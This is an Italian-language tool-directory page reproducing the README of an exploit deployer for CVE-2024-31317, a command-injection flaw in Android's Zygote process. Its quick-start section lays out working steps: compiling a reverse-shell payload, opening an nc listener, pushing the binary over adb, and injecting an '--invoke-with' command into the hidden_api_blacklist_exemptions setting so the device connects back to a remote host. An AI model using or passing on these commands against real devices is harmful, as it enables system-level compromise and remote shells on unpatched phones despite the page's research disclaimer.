Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-31317-Deployer — CVE-2024-31317 | Kitploit
Strumenti/GitHubGitHub/kalibb/cve-2024-31317-deployer
Sicurezza AndroidAnalisi delle VulnerabilitàExploitSicurezza MobileCommand and ControlApprendimento e FormazioneSviluppo PayloadBinary Exploitation
GitHubkalibb/cve-2024-31317-deployer

CVE-2024-31317-Deployer

CVE-2024-31317

Vedi Repository
16 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-31317 Deployer

License Android Status

🔒 Dichiarazione sulla Ricerca di Sicurezza

Questo progetto è destinato esclusivamente a scopi di ricerca sulla sicurezza e finalità didattiche. L'uso di questo strumento per test non autorizzati è illegale. Gli autori non sono responsabili per eventuali abusi o danni.

📋 Panoramica

CVE-2024-31317 è una grave vulnerabilità di sicurezza che colpisce i dispositivi Android 9 fino ad Android 13, consentendo a un'applicazione con il permesso WRITE_SECURE_SETTINGS di ottenere l'esecuzione con privilegi a livello di sistema tramite l'iniezione di comandi.

Questo progetto fornisce un'analisi tecnica dettagliata della vulnerabilità, un codice proof-of-concept e strumenti di distribuzione automatizzati.

✨ Caratteristiche Principali

  • 📱 Supporto completo per Android 9-13
  • 🛠️ Script di distribuzione automatizzati
  • 🔄 Connessione reverse shell
  • 📊 Documentazione tecnica dettagliata
  • 🎯 Design modulare

🐛 Dettagli della Vulnerabilità

  • CVE ID: CVE-2024-31317
  • Tipo di vulnerabilità: Iniezione di comandi
  • Livello di gravità: Alto (High)
  • Punteggio CVSS: 7.8
  • Componente interessato: processo Android Zygote
  • Stato della correzione: corretto nel patch di sicurezza Android di giugno 2024

🎯 Ambito di Impatto

Versioni Interessate

  • ✅ Android 9-13

Versioni Non Interessate

  • ❌ Android 14+ (corretto)
  • ❌ Dispositivi con il patch di sicurezza di giugno 2024 o successivo installato

📁 Struttura del Progetto

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 Avvio Rapido

1. Clonare il progetto

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. Compilare il Payload

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. Distribuzione

root@kitploit:~
# 启动监听器
nc -lvnp 4444

# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# 触发漏洞
adb shell stop && adb shell start

📚 Documentazione

  • Analisi tecnica approfondita
  • Istruzioni per l'uso del Payload
  • Tutorial completo d'uso

⚠️ Dichiarazione di Non Responsabilità

Questo progetto è destinato esclusivamente a scopi di ricerca sulla sicurezza e finalità didattiche. Utilizzando questo strumento, accetti di:

  • Rispettare tutte le leggi e le normative applicabili
  • Utilizzarlo solo per ricerche di sicurezza legittime
  • Essere pienamente responsabile delle proprie azioni

📜 Licenza

Questo progetto è concesso in licenza MIT - vedere il file LICENSE per i dettagli

👨‍💻 Autore

fcy10012 - GitHub

🙏 Ringraziamenti

Progetto di riferimento: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ Se questo progetto ti è stato utile, lascia una stella!

Scarica lo strumento